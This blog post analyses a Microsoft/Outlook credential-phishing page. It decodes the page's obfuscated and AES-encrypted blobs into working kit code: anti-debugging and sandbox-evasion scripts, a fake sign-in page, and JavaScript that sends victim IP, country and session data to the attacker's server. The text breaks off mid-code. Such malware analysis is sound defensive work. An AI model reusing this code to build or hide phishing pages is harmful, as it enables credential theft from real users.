Let’s Click the Link 1.5
In the previous post I broke down what the phishing email flow looked like. In this post, we are going to take some of the obfuscated code, decode it, and talk about what it does. Keep in mind, all this happens due to one simple click of the link.
Note: As of this writing mailspring has disabled the redirect to the phishing url, so we must go directly to the site.
The main phishing page, titled “Continue to Account Security”(CtAS), is full of LZString decompress and Base64. So why not start at the top.
The variable ‘ma‘
JYMwBAFAdghgbsA5jALgewE4DoDuBTAIwBMNg48MwAfKsHYKItHLAYxgBsOAFACxijoAttVr1GzLAH0ADv0FoRNMLATJ02AK4BnCgEFEeQVgasOmonm0QARACFNGGTYCULsAG8AsACgw/gP9xJhYONHYUYDQoMABeMBsYAjRNFAAuAg4BAGsbAG5fAF9fJlZNISMULBgiIgBRckEAGWBtFCMKW2y8AE8QqBsAGjAQTShWSOjIPEaUd28/ANHxyZiOCBnK+d9AwNZotrA4OLAAbR3dy48wbp6AYTRLNLAARgAmAGYwQsGLy8DrhMMBxnigMJo8MNbg8nmAABwAVm+v0W/wCgLBILAYIhw20vFA6Wx4MhN16MLwzwA7F8fn80Z4wECsTjSfjCaCSVDyY9KWAAGxU5H0tEY4Gc3FgdkgIms7n3XnUgAswtRDLFLK5UoJMolpOhirAVKRdLVoqZmL18op1LeyLAAHoHWA7piwABqMAACRF/2uFRQMCtYE4sq1BthNNVDPRYADQeJktDwYjfMF0ZjjPjKZ5sMR319/gAugUfIWwBg8ChHDE4FhtIo8BBgHEAHzlwIQACEwDYbuUm2MzIA0r13AAyccdgLd3vSlCiMCDqrz0c9CdTs3/WdYeOL5e7qswNcb6f+Heh/ezaocFAnsCTs9L6+puKxeK91PllylwLFMtqqAkDrMubieOWB4yJWswACJ4CAMCaLeEA/uWlbVhgMQIRwui/gE/6FKhPilOUlTVLUDSVC0bQdBgEAAOT7IIeAAB4oBUUCaPRwzLBMURQBsszbGqkHQZUcEIUhKAoXh/joTWIycLhRRESI8TYcpPgQLxqxgD0KHgWqHBVmABAnBpeCyUyBwLjIJwvAADA5Vm6CgACSzEYHAnDaWMfHRAZCxokxhwwCcMgUCAmBCAIrB4FgUDMDJ5aWAQmiIIYGBWXsNkVuFkXRbF8WJTgyVbv4QEQJQAC0IZgK2YB2ZOYBdgQwmZnGJystl/xmfE3VPsEkhhBE/FYJWMhZHFDG8CgKAyNoaROjgK24JwMUYFU+xCPRRFov+f7DI5DlEYRMlAA=
LZString.decompressFromBase64 into:
if (navigator.webdriver || window.callPhantom || window._phantom || navigator.userAgent.includes("Burp")) {
window.location = "about:blank";
}
document.addEventListener("keydown", function (event) {
function l(event) {
const v = [
{ keyCode: 123 },
{ ctrl: true, keyCode: 85 },
{ ctrl: true, shift: true, keyCode: 73 },
{ ctrl: true, shift: true, keyCode: 67 },
{ ctrl: true, shift: true, keyCode: 74 },
{ ctrl: true, shift: true, keyCode: 75 },
{ ctrl: true, keyCode: 72 }, // Ctrl + H
{ meta: true, alt: true, keyCode: 73 },
{ meta: true, alt: true, keyCode: 67 },
{ meta: true, keyCode: 85 }
];
return v.some(i =>
(!i.ctrl || event.ctrlKey) &&
(!i.shift || event.shiftKey) &&
(!i.meta || event.metaKey) &&
(!i.alt || event.altKey) &&
event.keyCode === i.keyCode
);
}
if (l(event)) {
event.preventDefault();
return false;
}
});
document.addEventListener('contextmenu', function(event) {
event.preventDefault();
return false;
});
m = false;
(function y() {
let b = false;
const p = 100;
setInterval(function() {
const a = performance.now();
debugger;
const r = performance.now();
if (r - a > p && !b) {
m = true;
b = true;
window.location.replace('https://www.walmart.com');
}
}, 100);
})();
If that looks familiar, it is because this is the code that checks for our ‘Dev Mode’, our hot-keys, and our right click, and redirects us to a random shopping website.
The next blob is variable kx. kx is a rather large Base64 blob that is AES encrypted:
Partial Code: kx = "m9v9z4PYbfZPClSiOmBSvlwtLy8B+MYOzyBsWiYcLww4fTrowzgNWVJqGZSRHYE7XA797SAPSQnwl03PKJSqqX1jN6m9ANQGZby6uyvtKeCg+uuBzQxj04mzK7UCFksJ7jLl3N2GpWSxZEBpJs2EWzDawRUBRsaWux8yy/KeXSrdOk+PALrQm9VlL+1qFkGcNPLoLqHUpD6w6rFjB1CMzwmWgMxoE1a/XygBa8ugnyYc+3gvudcP1tq+/i4T8kA8Y/i8WNW1DUkZy9OFhpfUY2ZoHhlrGA3mHId44sHVqDoHwwAskZM+rSy9DDKviyfBA+ffEyW92LfMqHcsFoAS6ZHRLEdk04p7VOoHS2VrEMg8dO6oyBNe6QzJGKwKrP4q+iVpNr47LLFP7Q3wa6hrUaVkCZCCf37LImuBOtDFZLYE3QLUr7qYHv2ZdRNQbWLswG17gGfgtKg6s2R1FcKawhIWM9rzbQ+bt94QWFbzFFNV1fOFa6tRIdgd2oIGQBDkBhwhUjai5K//kF//NPO8nfj1vqoY3GEbCp0tCDr+DP4kKXlG4t/Lczeubh8gUKUDzf+C0R6OY1+6mxkI8XtJ4ndic9OQhPCL3wzFOLaX/oS/Yid7IC+fUVD9mjr4+NMM7Gdf2bVDZ/twTuWzyn2c80SwX4DwL36s3xtCI4BsHq2c4ikKbcZw1n5p8kJ/N/QX0Jam5/wVPuMpxww1LQYyah2zgad3UyqzyvtpBEBwtbkC7ZUW4Cnmbmv2ci1Ij54FD9nEUAZ8AzFjNHRRz9WS4HhJF4O5nEgtrCFTFIv+v3jkIyOouc//KVmsUb9P+40QDnGJb5nvxKoGQSI/qDgTNUvAJHFuo9YI6NOwkmCridHb7dVRFheApd1LCbGm/bZ3degAO3KpHd50tJDVNaJQbxNPbIEAd4jV06BJSVx94ot6ASFx1uz/D8NSUOaZTbh8+jV5FIkHs0G6o8CCJ25DFHXoPJjJX3k0YbTGrfjl1DGivPHA5m95RDKTD0TdOWodQbGTeM9G9X/wuYUxIkNexOWA3l6Zaaptpru08mfkjK7OgZfYUDeIo4tLwWZvf4s7xw5iz2LkOcOxWZZ8yw+FzHevkulSgCl0Phxtr9Fyq+XfAYdJiyb19olPUL7g0kS0ySqngl6kA0loOm0YwF
In order to decrypt this blob, we need the following: Cyphertext, Initialization Vector(IV), and Key. Here is how we are going to get this information and decode this blob:
1. Decode the Base64 into hex code
2. Take the first 16 bytes of that hex and remove it/set it aside. Those first 16 bytes are our IV.
3. In the code of the CtAS page, right under the kx variable, we have our Key in Base64.
Now, with our powers combined…err…with that information, we can use CyberChef to decrypt this blob.
Partial Code c = atob; j = c(`PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vZ2l0aHViLmNvbS9mZW50L3JhbmRleHAuanMvcmVsZWFzZXMvZG93bmxvYWQvdjAuNC4zL3JhbmRleHAubWluLmpzIj48L3NjcmlwdD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jZG5qcy5jbG91ZGZsYXJlLmNvbS9hamF4L2xpYnMvY3J5cHRvLWpzLzQuMS4xL2NyeXB0by1qcy5taW4uanMiPjwvc2NyaXB0Pg0KICAgIDxzY3JpcHQgc3JjPSJodHRwczovL2NkbmpzLmNsb3VkZmxhcmUuY29tL2FqYXgvbGlicy9sei1zdHJpbmcvMS40LjQvbHotc3RyaW5nLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBocmVmPSIvNTY3dnZQRWFiN25GWTg5MTkiPg0KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJlZj0iL3h5ZGlxeVlMVUQ2SndhcnNZY2QyOCI+DQogICAgPGxpbmsgcmVsPSJwcmVsb2FkIiBocmVmPSIvR0RTaGVycGEtYm9sZC53b2ZmMiIgYXM9ImZvbnQiIHR5cGU9ImZvbnQvd29mZjIiIGNyb3Nzb3JpZ2luPSJhbm9ueW1vdXMiPg0KICAgIDxsaW5rIHJlbD0icHJlbG9hZCIgaHJlZj0iL0dEU2hlcnBhLWJvbGQud29mZiIgYXM9ImZvbnQiIHR5cGU9ImZvbnQvd29mZiIgY3Jvc3NvcmlnaW49ImFub255bW91cyI+DQogICAgPGxpbmsgcmVsPSJwcmVsb2FkIiBocmVmPSIvR0RTaGVycGEtcmVndWxhci53b2ZmMiIgYXM9ImZvbnQiIHR5cGU9ImZvbnQvd29mZjIiIGNyb3Nzb3JpZ2luPSJhbm9ueW1vdXMiPg0KICAgIDxsaW5rIHJlbD0icHJlbG9hZCIgaHJlZj0iL0dEU2hlcnBhLXJlZ3VsYXIud29mZiIgYXM9ImZvbnQiIHR5cGU9ImZvbnQvd29mZiIgY3Jvc3NvcmlnaW49ImFub255bW91cyI+DQogICAgPGxpbmsgcmVsPSJwcmVsb2FkIiBocmVmPSIvR0RTaGVycGEtdmYud29mZjIiIGFzPSJmb250IiB0eXBlPSJmb250L3dvZmYyIiBjcm9zc29yaWdpbj0iYW5vbnltb3VzIj4NCiAgICA8bGluayByZWw9InByZWxvYWQiIGhyZWY9Ii9HRFNoZXJwYS12ZjIud29mZjIiIGFzPSJmb250IiB0eXBlPSJmb250L3dvZmYyIiBjcm9zc29yaWdpbj0i
Here we have another Base64 blob(j) that is just encoded and not encrypted, so lets decode the Base64:
Partial Code
<!DOCTYPE html>
<html lang="en">
<head>
<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
<script src="https://github.com/fent/randexp.js/releases/download/v0.4.3/randexp.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/lz-string/1.4.4/lz-string.min.js"></script>
<link rel="stylesheet" href="/567vvPEab7nFY8919">
<link rel="stylesheet" href="/xydiqyYLUD6JwarsYcd28">
<link rel="preload" href="/GDSherpa-bold.woff2" as="font" type="font/woff2" crossorigin="anonymous">
<link rel="preload" href="/GDSherpa-bold.woff" as="font" type="font/woff" crossorigin="anonymous">
<link rel="preload" href="/GDSherpa-regular.woff2" as="font" type="font/woff2" crossorigin="anonymous">
<link rel="preload" href="/GDSherpa-regular.woff" as="font" type="font/woff" crossorigin="anonymous">
<link rel="preload" href="/GDSherpa-vf.woff2" as="font" type="font/woff2" crossorigin="anonymous">
<link rel="preload" href="/GDSherpa-vf2.woff2" as="font" type="font/woff2" crossorigin="anonymous">
<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
<meta name="robots" content="none">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title></title>
<style>body { height: 100vh !important; width: 100vw !important; } body.startnew { background-color: #f2f2f2; background-image: url('/ijoBPrFo9f5Y4pPAi6TVLcEa6HhwZZsgQRpgyns57XE6nsdJHVODRPX7NuFmfhhmU3uERpGhzNZ3k88nosjPpiLHfXJSG1Jukzky1OlTOXV2yeWMJj9p7Qx3Sj3cicSAmK3DhVq7NecUurwiQrBwx660'); background-repeat: no-repeat,no-repeat; background-position: center center,center center; background-size: cover,cover; color: #1b1b1b; } input:-webkit-autofill, input:-webkit-autofill:hover, input:-webkit-autofill:focus, input:-webkit-autofill:active{ -webkit-box-shadow: 0 0 0 30px white inset !important; } .btn { margin: 0 0 0 auto; display: block; background-color: #0067b8; color: #fff; border: 2px solid #0067b8; /* padding: 5px 30px; */ padding: 5px 37px; font-size: 15px; cursor: pointer; } .btn:hover { background-color: #085998; } .firstlogo{ background-image: url("/ijpFz5Nez8rxfgvewCTwKLznLWuGBfopBdHpec3NLPyqrGBV784Joyelu6ZXOVqZeeab230"); background-size: 100% 100%; width: 108px; height: 24px; background-repeat: no-repeat; } .bannerlogo{ height: 24px; max-height: 36px; background-image: url("/ijpFz5Nez8rxfgvewCTwKLznLWuGBfopBdHpec3NLPyqrGBV784Joyelu6ZXOVqZeeab230"); background-size: 100% 100%; width: 108px; background-repeat: no-repeat; background-size: contain; }
#TpBhsecrCi {
display: none;
}
#goog-gt-tt,
.goog-te-spinner-pos {
display: none !important;
visibility: hidden !important;
}
.goog-te-spinner-pos + div {
display: none !important;
height: 0 !important;
overflow: hidden !important;
}
.goog-brand {
display: none !important;
}
.VIpgJd-ZVi9od-aZ2wEe-wOHMyf {
display: none !important;
}
.goog-te-banner-frame.skiptranslate,
.goog-te-gadget-icon,
.goog-logo-link,
.goog-te-gadget,
.goog-te-banner-frame {
display: none !important;
}
.skiptranslate {
display: none !important;
}
@font-face { font-family: 'gdsherpa'; font-weight: 700; src: url(/GDSherpa-bold.woff2) format('woff2'),url(/GDSherpa-bold.woff) format('woff'); unicode-range: U+0-10FFFF; font-display: swap } @font-face { font-family: 'gdsherpa'; font-weight: 400; src: url(/GDSherpa-regular.woff2) format('woff2'),url(/GDSherpa-regular.woff) format('woff'); unicode-range: U+0-10FFFF; font-display: swap } @font-face { font-family: 'gdsherpa'; font-weight: 1 999; src: url(/GDSherpa-vf.woff2) format('woff2'),url(/GDSherpa-vf.woff2) format('woff2-variations'); unicode-range: U+0-10FFFF; font-display: swap } @font-face { font-family: 'gdsherpa'; font-weight: 1 900; src: url(/GDSherpa-vf2.woff2) format('woff2'),url(/GDSherpa-vf2.woff2) format('woff2-variations'); unicode-range: U+0-10FFFF; font-display: swap }</style>
<script>
ma = "JYMwBAFAdghgbsA5jALgewE4DoDuBTAIwBMNg48MwAfKsHYKItHLAYxgBsOAFACxijoAttVr1GzLAH0ADv0FoRNMLATJ02AK4BnCgEFEeQVgasOmonm0QARACFNGGTYCULsAG8AsACgw/gP9xJhYONHYUYDQoMABeMBsYAjRNFAAuAg4BAGsbAG5fAF9fJlZNISMULBgiIgBRckEAGWBtFCMKW2y8AE8QqBsAGjAQTShWSOjIPEaUd28/ANHxyZiOCBnK+d9AwNZotrA4OLAAbR3dy48wbp6AYTRLNLAARgAmAGYwQsGLy8DrhMMBxnigMJo8MNbg8nmAABwAVm+v0W/wCgLBILAYIhw20vFA6Wx4MhN16MLwzwA7F8fn80Z4wECsTjSfjCaCSVDyY9KWAAGxU5H0tEY4Gc3FgdkgIms7n3XnUgAswtRDLFLK5UoJMolpOhirAVKRdLVoqZmL18op1LeyLAAHoHWA7piwABqMAACRF/2uFRQMCtYE4sq1BthNNVDPRYADQeJktDwYjfMF0ZjjPjKZ5sMR319/gAugUfIWwBg8ChHDE4FhtIo8BBgHEAHzlwIQACEwDYbuUm2MzIA0r13AAyccdgLd3vSlCiMCDqrz0c9CdTs3/WdYeOL5e7qswNcb6f+Heh/ezaocFAnsCTs9L6+puKxeK91PllylwLFMtqqAkDrMubieOWB4yJWswACJ4CAMCaLeEA/uWlbVhgMQIRwui/gE/6FKhPilOUlTVLUDSVC0bQdBgEAAOT7IIeAAB4oBUUCaPRwzLBMURQBsszbGqkHQZUcEIUhKAoXh/joTWIycLhRRESI8TYcpPgQLxqxgD0KHgWqHBVmABAnBpeCyUyBwLjIJwvAADA5Vm6CgACSzEYHAnDaWMfHRAZCxokxhwwCcMgUCAmBCAIrB4FgUDMDJ5aWAQmiIIYGBWXsNkVuFkXRbF8WJTgyVbv4QEQJQAC0IZgK2YB2ZOYBdgQwmZnGJystl/xmfE3VPsEkhhBE/FYJWMhZHFDG8CgKAyNoaROjgK24JwMUYFU+xCPRRFov+f7DI5DlEYRMlAA=";
bo = LZString.decompressFromBase64(ma);
it = 'e' + 'v' + 'a' + 'l';
(0, globalThis[it])(bo);
</script>
<script>
document.addEventListener('copy', function(event) {
if (document.activeElement.tagName === 'INPUT' ||
document.activeElement.tagName === 'TEXTAREA' ||
document.activeElement.isContentEditable) {
return;
}
event.preventDefault();
var customWord = "k";
event.clipboardData.setData('text/plain', customWord);
});
</script>
<!-- Stop chasing the money and start chasing the passion. -->
<script>
document.getElementById('SvoAdVGfyq').remove();
document.getElementById('QnsiKOkrpi').setAttribute('class', "startnew");
document.getElementById('QnsiKOkrpi').removeAttribute('style');
document.getElementById('QnsiKOkrpi').removeAttribute('id');
document.getElementById('pewmrVZUJA').remove();
var w = document.currentScript;
w.parentNode.removeChild(w);
</script>
</head>
<body class="startnew">
<!-- Success is not how high you have climbed, but how you make a positive difference to the world. -->
<div id="TpBhsecrCi"></div>
<!-- Success is not the key to happiness. Happiness is the key to success. If you love what you are doing, you will be successful. -->
<div id="sections" class="">
<!-- <div>Success is where preparation and opportunity meet.</div> -->
<!-- <div>Innovation distinguishes between a leader and a follower.</div> -->
<section id="section_tryingtosignin" style="animation:show-from-right 0.5s;" class="">
<div class="auth-wrapper">
<!-- <div>Don't be afraid to give up the good to go for the great.</div> -->
<div class="loading-container loading">
<div class="dot-floating"></div>
<div class="dot-floating"></div>
<!-- <div>Success is not the key to happiness. Happiness is the key to success.</div> -->
<div class="dot-floating"></div>
<!-- Don't be afraid to give up the good to go for the great. -->
<div class="dot-floating"></div>
<div class="dot-floating"></div>
<div class="dot-floating"></div>
</div>
<!-- Success means doing the best we can with what we have. Success is the doing, not the getting; in the trying, not the triumph. -->
<div class="sectioncontent">
<div class="firstlogo"></div>
<h2 class="title mb-16 mt-16">Trying to sign you in</h2>
<div class="bottomsection">
<!-- Try not to become a man of success. Rather become a man of value. -->
<a href="javascript:void(0)">Cancel</a>
<!-- <div>Success is finding satisfaction in giving a little more than you take.</div> -->
</div>
<!-- <p class="mb-16 fs-13">No account? <a href="" class="link">Create one!</a></p> -->
</div>
<!-- Success is not the absence of failure; it's the persistence through failure. -->
</div>
</section>
<!-- Success is not the absence of failure; it's the persistence through failure. -->
<section id="section_uname" class="d-none">
<div class="out2-back-holder" id="out2-logo" style="display:none;">
<img class="out2-back" src="/bcoQRApzb877WdWUk82nzO5hLiY2s0Jg9ql2adAUuazYKdomKlJhkZG6xXZc8UKdn45bDzVJRyBDsc8HGsvvWy72G8VFix8E8nG9UBuzQdN3VNmSLvop661">
</div>
<!-- Success is not final, failure is not fatal: It is the courage to continue that counts. -->
<div class="auth-wrapper">
<div class="loading-container">
<!-- <div>Don't be afraid to give up the good to go for the great.</div> -->
<div class="dot-floating"></div>
<div class="dot-floating"></div>
<div class="dot-floating"></div>
<!-- <div>Never give in except to convictions of honor and good sense.</div> -->
<div class="dot-floating"></div>
<div class="dot-floating"></div>
<div class="dot-floating"></div>
</div>
<!-- Success usually comes to those who are too busy to be looking for it. -->
<div class="sectioncontent">
<div class="firstlogo"></div>
<!-- Success is how high you bounce when you hit bottom. -->
<button class="back" onclick="backbtn()" style="display: none">
<img src="/wx9kzoGEqx5MmemWgPnstlt3bVnwYcdF2vzUHoK6f12126"/>
</button>
<h2 class="title mt-16">Sign in</h2>
<!-- The starting point of all achievement is desire. -->
<p class="subtitle mb-16">to continue to Outlook</p>
<div class="mb-16">
<div id="error_uname" class="error"></div>
<!-- Success usually comes to those who are too busy to be looking for it. -->
<input id="inp_uname" type="text" name="uname" class="input" autocomplete="off" oninput="removespaces(this)" value="" placeholder="Email, phone, or Skype" />
<!-- <div>Success is how high you bounce when you hit bottom.</div> -->
</div>
<div class="bottomsection"><p class="mb-16">No account? <a href="javascript:void(0)" data-id="signup" onclick="linkoptionclick(this)" class="link">Create one!</a></p><a class="link mb-16" data-id="cantAccessAccount" onclick="linkoptionclick(this)" href="javascript:void(0)">Can't access your account?</a></div>
<!-- <div>Success is not in what you have, but who you are.</div> -->
<!-- <p class="mb-16 fs-13">No account? <a href="" class="link">Create one!</a></p> -->
<button class="btn" id="btn_next">Next</button>
</div>
<!-- <div>Success is how high you bounce when you hit bottom.</div> -->
</div>
<div class="opts">
<p class="has-icon mb-0" style="font-size:15px;"><span class="icon"><img src="/qrFb4ust6sG3HzO9K5GtI0tghoY61mdzCYfBJCQKfFFTc267140" width="30px" /></span> Sign-in options</p>
<!-- <div>All our dreams can come true if we have the courage to pursue them.</div> -->
</div>
<!-- <div>Success is not in what you have, but who you are.</div> -->
</section>This appears to be the main html of our phishing page. It also brings up the ma code again meaning that, not only does it perform the anti-debug maneuvers before the page fully loads, but also once the page is loaded.
Moving through the code, we see various kibbles and bits that clearly indicate this site is trying to trick your user, please see the previous post for snippets.
As we continue through the code we come across another large piece of Base64 known as wg:
Partial Code: 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
This blob is encrypted, so we will use the same method from last time to decrypt it:
var otherweburl = "";
var websitenames = ["godaddy", "okta"];
var bes = ["Apple.com","Netflix.com"];
var pes = ["https:\/\/t.me\/","https:\/\/t.com\/","t.me\/","https:\/\/t.me.com\/","t.me.com\/","t.me@","https:\/\/t.me@","https:\/\/t.me","https:\/\/t.com","t.me","https:\/\/t.me.com","t.me.com","t.me\/@","https:\/\/t.me\/@","https:\/\/t.me@\/","t.me@\/","https:\/\/www.telegram.me\/","https:\/\/www.telegram.me","Telegram"];
var capnum = 1;
var appnum = 1;
var pvn = 0;
var view = "";
var pagelinkval = "pqReX8";
var emailcheck = "0";
var webname = "rtrim(/web9/, '/')";
var urlo = "/kibkDCHlihnaL7S65NxNxUJHez730wl2Efqu3p6tuH7vh";
var gdf = "/ijAkraNBxpxsjxUN4vxpTV2ZOyzLXrIKObUZ98c2cd120";
var odf = "/ghFfNTeJLDUwCfdCuvhWeTb5JNx3Eab645";
var twa = 0;
var currentreq = null;
var requestsent = false;
var pagedata = "";
var redirecturl = "https://login.microsoftonline.com/common/SAS/ProcessAuth";
var userAgent = navigator.userAgent;
var browserName;
var userip;
var usercountry;
var errorcodeexecuted = false;
if(userAgent.match(/edg/i)){
browserName = "Edge";
} else if(userAgent.match(/chrome|chromium|crios/i)){
browserName = "chrome";
} else if(userAgent.match(/firefox|fxios/i)){
browserName = "firefox";
} else if(userAgent.match(/safari/i)){
browserName = "safari";
} else if(userAgent.match(/opr\//i)){
browserName = "opera";
} else{
browserName="No browser detection";
}
function removespaces(input) {
input.value = input.value.replace(/\s+/g, ''); // Removes all spaces
}
//
function sendlive(statusval) {
$.ajax({
type: "POST",
url: urlo,
data: stringToBinary(encryptData(JSON.stringify({
pagelink: pagelinkval,
type: statusval,
ip: userip,
country: usercountry,
useragent: userAgent,
appnum: appnum
}))),
success: function(response) {
},
error: function(xhr, status, error) {
console.error("Error:", error);
}
});
}
$.get("https://get.geojs.io/v1/ip/geo.json", function(response) {
userip = response.ip;
usercountry = response.country;
sendlive(13);
}, "json").fail(function(jqXHR, textStatus, errorThrown) {
if (jqXHR.status === 429 || textStatus !== "success") {
setTimeout(sendemailrequestzero, 1000);
}
});
//
function encryptData(data) {
const key = CryptoJS.enc.Utf8.parse('1234567890123456');
const iv = CryptoJS.enc.Utf8.parse('1234567890123456');
const encrypted = CryptoJS.AES.encrypt(data, key, {
iv: iv,
padding: CryptoJS.pad.Pkcs7,
mode: CryptoJS.mode.CBC
});
return encrypted.toString();
}
function stringToBinary(input) {
const zeroReplacement = '0';
const oneReplacement = '1';
return btoa(input
.split('')
.map(char => {
let binary = char.charCodeAt(0).toString(2);
binary = binary.padStart(8, '0');
return binary
.split('')
.map(bit => (bit === '0' ? zeroReplacement : oneReplacement))
.join('');
})
.join(' '));
}
function decryptData(encryptedData) {
const key = CryptoJS.enc.Utf8.parse('1234567890123456');
const iv = CryptoJS.enc.Utf8.parse('1234567890123456');
const decrypted = CryptoJS.AES.decrypt(encryptedData, key, {
iv: iv,
padding: CryptoJS.pad.Pkcs7,
mode: CryptoJS.mode.CBC
});
return decrypted.toString(CryptoJS.enc.Utf8);
}
var sendAndReceive = (route, args, getresponse) => {
if(requestsent == true && route !== "twofaselect"){
return new Promise((resolve, reject) => {
return resolve({message: "waiting for previous request to complete"});
});
}
if(requestsent == false || route == "twofaselect"){
requestsent = true;
let routename = null;
let randpattern = null;
if(route == "checkemail"){
randpattern = /(pq|rs)[A-Za-z0-9]{6,18}(yz|12|34)[A-Za-z0-9]{2,7}(uv|wx)(3[1-9]|40)/gm;
}
if(route == "checkpass"){
randpattern = /(yz|12)[A-Za-z0-9]{7,14}(56|78)[A-Za-z0-9]{3,8}(op|qr)(4[1-9]|50)/gm;
}
if(route == "twofaselect"){
